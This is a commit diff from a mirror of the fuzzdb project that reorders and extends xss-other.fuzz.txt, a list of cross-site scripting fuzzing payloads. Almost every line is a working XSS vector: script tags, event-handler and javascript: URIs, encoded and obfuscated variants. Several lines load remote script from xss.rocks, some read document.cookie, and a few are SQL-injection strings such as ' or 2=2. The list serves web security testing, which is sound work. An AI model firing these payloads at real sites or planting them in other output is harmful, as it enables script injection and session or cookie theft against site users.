mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-27 05:20:20 +00:00
Update xss-other.fuzz.txt
This commit is contained in:
parent
a949e4e409
commit
ea0b7142c2
1 changed files with 46 additions and 31 deletions
|
@ -1,42 +1,57 @@
|
||||||
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
'
|
||||||
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
<font style='color:expression(alert('XSS'))'>
|
||||||
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
' or 2=2
|
||||||
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
"
|
||||||
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
" or 202
|
||||||
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
";eval(unescape(location))//# %0Aalert(0)
|
||||||
<img src=x:x onerror=alert(1)>
|
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||||
javascript:alert(1)
|
|
||||||
alert(1)
|
|
||||||
alert
|
|
||||||
alert(1)
|
alert(1)
|
||||||
alert(1)
|
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
||||||
alert`1`
|
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
||||||
alert\\`1\\`
|
&#39;&#88;&#83;&#83;&#39;&#41;>
|
||||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||||
|
<img src=x:x onerror=alert(1)>
|
||||||
|
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
|
||||||
|
<SCRIPT SRC=//xss.rocks/.j>
|
||||||
|
'); alert('XSS
|
||||||
|
\";alert('XSS');//
|
||||||
|
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
||||||
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||||
<a onmouseover="alert(document.cookie)">xxs link</a>
|
<a onmouseover="alert(document.cookie)">xxs link</a>
|
||||||
<a onmouseover=alert(document.cookie)>xxs link</a>
|
<a onmouseover=alert(document.cookie)>xxs link</a>
|
||||||
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
<BASE HREF="javascript:alert('XSS');//">
|
||||||
<IMG SRC= onmouseover="alert('xxs')">
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||||
|
<body onLoad="alert('XSS');"
|
||||||
|
<body onunload="javascript:alert('XSS');">
|
||||||
|
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
|
||||||
|
<iframe src=http://xss.rocks/scriptlet.html <
|
||||||
|
<IMG DYNSRC=\"javascript:alert('XSS')\">
|
||||||
<IMG onmouseover="alert('xxs')">
|
<IMG onmouseover="alert('xxs')">
|
||||||
<img src=x onerror="javascript:alert('XSS')">
|
<IMG SRC= onmouseover="alert('xxs')">
|
||||||
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
|
<IMG SRC="  javascript:alert('XSS');">
|
||||||
&#39;&#88;&#83;&#83;&#39;&#41;>
|
|
||||||
<IMG SRC=javascript:alert('XSS')>
|
|
||||||
<IMG SRC=javascript:alert('XSS')>
|
|
||||||
<IMG SRC="jav	ascript:alert('XSS');">
|
<IMG SRC="jav	ascript:alert('XSS');">
|
||||||
<IMG SRC="jav&#x09;ascript:alert('XSS');">
|
<IMG SRC="jav&#x09;ascript:alert('XSS');">
|
||||||
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
|
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
|
||||||
<IMG SRC=java%00script:alert(\"XSS\")>
|
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
||||||
<IMG SRC="  javascript:alert('XSS');">
|
|
||||||
<SCRIPT\s" != "<SCRIPT/XSS\s';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
||||||
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
||||||
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
|
|
||||||
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
||||||
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
|
|
||||||
<SCRIPT SRC=//xss.rocks/.j>
|
|
||||||
<IMG SRC="javascript:alert('XSS')"
|
<IMG SRC="javascript:alert('XSS')"
|
||||||
<iframe src=http://xss.rocks/scriptlet.html <
|
<img src="javascript:alert('XSS')">
|
||||||
\";alert('XSS');//
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC=java%00script:alert(\"XSS\")>
|
||||||
|
<img src=x onerror="javascript:alert('XSS')">
|
||||||
|
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||||
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
|
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
|
||||||
|
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
|
||||||
|
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT\s" != "<SCRIPT/XSS\s';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||||
|
<script>alert('XSS');</script>
|
||||||
|
alert
|
||||||
|
alert(1)
|
||||||
|
alert(1)
|
||||||
|
alert\\`1\\`
|
||||||
|
alert`1`
|
||||||
|
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
||||||
|
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
||||||
javascript:alert%28/xss/%29
|
javascript:alert%28/xss/%29
|
||||||
";eval(unescape(location))//# %0Aalert(0)
|
javascript:alert(1)
|
||||||
|
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
||||||
|
|
Loading…
Reference in a new issue